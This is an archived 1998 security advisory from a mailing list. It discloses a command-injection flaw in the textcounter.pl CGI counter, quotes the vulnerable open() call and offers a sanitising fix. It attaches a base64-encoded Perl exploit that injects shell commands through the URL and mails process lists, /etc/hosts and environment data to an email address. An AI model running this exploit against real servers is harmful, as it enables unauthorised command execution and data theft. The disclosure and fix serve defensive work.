This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. ---490663578-807079570-898667471=:9579 Content-Type: TEXT/PLAIN; charset=US-ASCII Hi, I've found a serious problem in textcounter.pl script that enable everybody to execute commands on your system with the same rights as the httpd daemon. Program was created by Matt Wright (mattwat_private) and has a "Last Modified Date" at 5/10/96. You can find it at http://www.worldwidemart.com/scripts/. The counter use the enviroment variable DOCUMENT_URI to create/read/update a file where it keeps the hit count. There is NO test for shell metacharacters, so you can easily put something evil, that will make PERL to execute it ... This is the two lines responsible with the problem ... if (-e "$data_dir$count_page") { open(COUNT,"$data_dir$count_page"); .... } Because of the test condition, the attack have to be repeated twice to succeed. First time the condition is false and the tricky file gets created, and the second time, the condition is true and our commands get executed ... Nice isn't it ? :( The fix is very simple: add after line 91, another line that will make sure that there is NO tricky characters in the filename. $count_page = "$ENV{'DOCUMENT_URI'}"; # the original 91 line .... $count_page =~ s/([^a-z0-9])/sprintf("%%%02X",$1)/ge; # ADD THIS !!!!! If you want to make sure that your system is vulnerable or not, you can use the small program that it's attached. No cracking please ... Best regards, ------ Doru Petrescu KappaNet - Software Engineer E-mail: pdoruat_private ---490663578-807079570-898667471=:9579 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="cnt-exploit.pl" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.3.96.980624085111.9579Bat_private> Content-Description: counter.pl exploit IyEvdXNyL2Jpbi9wZXJsDQoNCiRVUkw9J2h0dHA6Ly9kdHAua2FwcGEucm8v YS90ZXN0LnNodG1sJzsgICAgIyBwbGVhc2UgX0RPXyBfbW9kaWZ5XyB0aGlz IA0KJEVNQUlMPSdwZG9ydUBwb3AzLmthcHBhLnJvLHJvb3QnOyAgIAkgICAg IyBwbGVhc2UgX0RPXyBfbW9kaWZ5XyB0aGlzDQoNCg0KaWYgKCRBUkdWWzBd KSB7DQogICAkQ01EPSRBUkdWWzBdOw0KfWVsc2V7DQogICAkQ01EPSIocHMg YXg7Y2QgLi47Y2QgLi47Y2QgLi47Y2QgZXRjO2NhdCBob3N0cztzZXQpXHxt YWlsICR7RU1BSUx9IC1zYW5vdGhlcmVfb25lIjsNCn0NCg0KJHRleHQ9IiR7 VVJMfS87SUZTPVw4OyR7Q01EfTtlY2hvfCI7DQokdGV4dCA9fiBzLyAvXCRc e0lGU1x9L2c7DQoNCiNwcmludCAiJHRleHRcbiI7DQoNCnN5c3RlbSh7Indn ZXQifSAid2dldCIsICR0ZXh0LCAiLU8vZGV2L251bGwiKTsNCnN5c3RlbSh7 IndnZXQifSAid2dldCIsICR0ZXh0LCAiLU8vZGV2L251bGwiKTsNCiNzeXN0 ZW0oeyJseW54In0gImx5bngiLCAkdGV4dCk7IA0KI3N5c3RlbSh7Imx5bngi fSAibHlueCIsICR0ZXh0KTsgICAgICMgaWYgeW91IGRvbid0IGhhdmUgIndn ZXQiDQoJCQkJICAjIHlvdSBjYW4gdHJ5IHdpdGggIkx5bngiDQoNCg== ---490663578-807079570-898667471=:9579--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:59:15 PDT